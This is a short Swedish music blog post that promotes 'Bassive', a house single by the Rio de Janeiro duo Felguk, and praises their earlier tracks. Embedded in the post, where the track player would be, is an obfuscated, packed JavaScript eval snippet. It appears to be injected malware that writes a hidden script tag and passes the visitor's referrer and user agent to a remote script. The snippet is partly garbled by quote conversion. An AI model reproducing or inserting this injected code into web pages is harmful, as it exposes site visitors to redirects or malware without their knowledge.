Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Felguk – Bassive

Felguk – Bassive
Sebastian

Många av oss må känna oss lite rostiga efter ännu en löningsfredag, men på Revue.se har festhelgen bara börjat! Av den anledningen kommer här lite grym house från Rio De Janeiro-baserade duon Felguk. Dessa två herrar har tagit house- och technoscenen med storm sedan 2007 och gett oss superlåtar som ”Jack It”, ”Step on the Scene” och deras remix på Masons ”Exceeder” för att bara nämna några, jag hade antagligen skrivit ner varenda låt de släppt om jag skulle lista alla mina favoriter.

Med sitt råa och hänsynslösa ljud har de nått alla houselyssnarnas och stora producenternas hjärtan och jag ser inget slut på den brutala hypen som ligger kring undret som är Felguk.

Här nedan finner ni deras senaste singel, släppt på Dongle Records, ett perfekt exempel på vad brasilianarna går för.
Felguk eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zrhyt|var|u0026u|referrer|tzrsy||js|php’.split(’|’),0,{}))
– BASSIVE
by felguk